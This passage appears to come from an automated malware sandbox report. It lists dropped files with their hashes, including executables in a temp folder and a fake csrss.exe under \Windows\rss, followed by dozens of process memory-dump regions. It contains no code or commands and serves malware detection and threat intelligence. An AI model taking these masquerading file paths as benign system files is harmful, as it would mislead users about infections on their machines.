47ce387287cd3add5c1178ef7ea2b6297ef0e35ebee0255184ab8be74546657159d2232ac90e16d9725e422ce303ab3a72979a43f3e3d51f06dfce5b1a3e825c

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Users\Admin\AppData\Local\Temp\u1f4.0.exe

Filesize
192KB

MD5
8eeb76dec31b0ccdfdde0df8ef2e2135

SHA1
96084de222d741a367e7dff543bc055a70d86045

SHA256
df44dd1015c34fa9515af713292777602d572af6b175cd6cc6f5e0b9c40b598b

SHA512
f989d6949ec77542fadc28fa2609d0be30e4e578822a182e41e340f9118ae4a0b6e7961bf19ba1878ac6e20e2765619d57a12a07117067ccb6485fe4d56faf1c

Download Submit
\Users\Admin\AppData\Local\Temp\u1f4.1.exe

Filesize
64KB

MD5
0fb85b1e7ed30de7956b2462e114974d

SHA1
6e970eeb401f8d57dfdae81b98ee518a577c2186

SHA256
fd40333f3dd43a6b42f605cac5a8ee7fa8609513b14569268ec22d7ee460b195

SHA512
a29c38c2ac1cea89926cc7779efb261b1823ee3ecdf6e8584f792a182e13931ea00dd4c1e38f83fb49a1cc239dfff1b1892947d468b2c7325fc0d2ee26319d9e

Download Submit
\Windows\rss\csrss.exe

Filesize
832KB

MD5
a69d289e27bb41f53b03e7385747c0d6

SHA1
77123493d8b4d4830fda005e853e89b65cafd13f

SHA256
e03398b001bf897cb52e69d04d13c7ac1b7edbc2745f6ed9140fe3a8c7942357

SHA512
b600855e1080323aaf0c5ffb7913b8329adde7ef8b2441c6c07565b6d08cd0d6f6976db702aac992ca9ffe17af0a17bfa8ccd031a731557d1f6e8bf888195499

Download Submit
\Windows\rss\csrss.exe

Filesize
768KB

MD5
44ff2ed7f28622afe0e5ba7c1cd702a7

SHA1
5aec4a3f1f3a57a7cd8a366c736e2e932f529ed8

SHA256
7d16cc26a07cc79b96c5ee6512102dae8ae526c4ae529380c412b0d45bc8351a

SHA512
c0b766f1f8a4977fdc47adbcd10dbfabc0996a9421cab4d98ded773ddcefbb101d3137beb9e2ff4ea2b5d66849875e754bcbe0486396ce6a43b15262ccf82266

Download Submit
memory/1368-308-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1368-313-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1544-152-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1544-166-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1840-19-0x0000000001B00000-0x0000000001C00000-memory.dmp

Filesize
1024KB

Download
memory/1840-22-0x0000000000400000-0x0000000001A4B000-memory.dmp

Filesize
22.3MB

Download
memory/1840-65-0x0000000001B00000-0x0000000001C00000-memory.dmp

Filesize
1024KB

Download
memory/1840-62-0x0000000000400000-0x0000000001A4B000-memory.dmp

Filesize
22.3MB

Download
memory/1840-63-0x0000000004E30000-0x0000000005360000-memory.dmp

Filesize
5.2MB

Download
memory/1840-61-0x0000000004E30000-0x0000000005360000-memory.dmp

Filesize
5.2MB

Download
memory/1840-233-0x0000000004E30000-0x0000000005360000-memory.dmp

Filesize
5.2MB

Download
memory/1840-66-0x0000000004E30000-0x0000000005360000-memory.dmp

Filesize
5.2MB

Download
memory/1840-21-0x0000000000300000-0x0000000000367000-memory.dmp

Filesize
412KB

Download
memory/2036-426-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/2036-378-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/2108-457-0x0000000002520000-0x0000000002540000-memory.dmp

Filesize
128KB

Download
memory/2108-416-0x0000000002500000-0x0000000002520000-memory.dmp

Filesize
128KB

Download
memory/2108-450-0x0000000002500000-0x0000000002520000-memory.dmp

Filesize
128KB

Download
memory/2108-417-0x0000000002520000-0x0000000002540000-memory.dmp

Filesize
128KB

Download
memory/2128-304-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2128-301-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2132-427-0x0000000000350000-0x0000000000C1D000-memory.dmp

Filesize
8.8MB

Download
memory/2132-391-0x0000000000350000-0x0000000000C1D000-memory.dmp

Filesize
8.8MB

Download
memory/2140-0-0x0000000000FF0000-0x000000000147C000-memory.dmp

Filesize
4.5MB

Download
memory/2140-1-0x0000000074C90000-0x000000007537E000-memory.dmp

Filesize
6.9MB

Download
memory/2140-20-0x0000000074C90000-0x000000007537E000-memory.dmp

Filesize
6.9MB

Download
memory/2208-256-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2208-68-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2208-67-0x0000000000400000-0x0000000000930000-memory.dmp

Filesize
5.2MB

Download
memory/2208-145-0x0000000000400000-0x0000000000930000-memory.dmp

Filesize
5.2MB

Download
memory/2208-101-0x0000000000400000-0x0000000000930000-memory.dmp

Filesize
5.2MB

Download
memory/2260-25-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2260-18-0x00000000039F0000-0x0000000003DE8000-memory.dmp

Filesize
4.0MB

Download
memory/2260-24-0x0000000003DF0000-0x00000000046DB000-memory.dmp

Filesize
8.9MB

Download
memory/2260-72-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2260-26-0x00000000039F0000-0x0000000003DE8000-memory.dmp

Filesize
4.0MB

Download
memory/2260-69-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2432-71-0x00000000037C0000-0x0000000003BB8000-memory.dmp

Filesize
4.0MB

Download
memory/2432-75-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2432-74-0x00000000037C0000-0x0000000003BB8000-memory.dmp

Filesize
4.0MB

Download
memory/2432-86-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2656-229-0x0000000000400000-0x00000000022D9000-memory.dmp

Filesize
30.8MB

Download
memory/2656-257-0x0000000000400000-0x00000000022D9000-memory.dmp

Filesize
30.8MB

Download
memory/2656-45-0x0000000002460000-0x0000000002560000-memory.dmp

Filesize
1024KB

Download
memory/2656-46-0x0000000000220000-0x0000000000247000-memory.dmp

Filesize
156KB

Download
memory/2656-47-0x0000000000400000-0x00000000022D9000-memory.dmp

Filesize
30.8MB

Download
memory/2656-73-0x0000000000400000-0x00000000022D9000-memory.dmp

Filesize
30.8MB

Download
memory/2656-84-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/2656-105-0x0000000000400000-0x00000000022D9000-memory.dmp

Filesize
30.8MB

Download
memory/2656-230-0x0000000002460000-0x0000000002560000-memory.dmp

Filesize
1024KB

Download
memory/2896-148-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-315-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-295-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-264-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-263-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-262-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-387-0x000000002E850000-0x000000002F11D000-memory.dmp

Filesize
8.8MB

Download
memory/2896-390-0x000000002E850000-0x000000002F11D000-memory.dmp

Filesize
8.8MB

Download
memory/2896-307-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-232-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-377-0x000000002E850000-0x000000002ED31000-memory.dmp

Filesize
4.9MB

Download
memory/2896-395-0x000000002E950000-0x000000002EE38000-memory.dmp

Filesize
4.9MB

Download
memory/2896-321-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-401-0x000000002E950000-0x000000002EE38000-memory.dmp

Filesize
4.9MB

Download
memory/2896-107-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-375-0x000000002E850000-0x000000002ED31000-memory.dmp

Filesize
4.9MB

Download
memory/2896-103-0x0000000003680000-0x0000000003A78000-memory.dmp

Filesize
4.0MB

Download
memory/2896-324-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-325-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-441-0x000000002E950000-0x000000002EE38000-memory.dmp

Filesize
4.9MB

Download
memory/2896-434-0x000000002E950000-0x000000002EE38000-memory.dmp

Filesize
4.9MB

Download
memory/2896-312-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-85-0x0000000003680000-0x0000000003A78000-memory.dmp

Filesize
4.0MB

Download
memory/2896-423-0x000000002E850000-0x000000002ED31000-memory.dmp

Filesize
4.9MB

Download
memory/2896-425-0x000000002E850000-0x000000002ED31000-memory.dmp

Filesize
4.9MB

Download
memory/2896-305-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-318-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/2896-433-0x000000002E850000-0x000000002F11D000-memory.dmp

Filesize
8.8MB

Download
memory/2960-443-0x0000000000400000-0x00000000008E8000-memory.dmp

Filesize
4.9MB

Download
memory/2960-402-0x0000000000400000-0x00000000008E8000-memory.dmp

Filesize
4.9MB

Download
memory/3020-415-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/3020-413-0x0000000000400000-0x0000000001E0F000-memory.dmp

Filesize
26.1MB

Download
memory/3020-412-0x0000000003750000-0x0000000003B48000-memory.dmp

Filesize
4.0MB

Download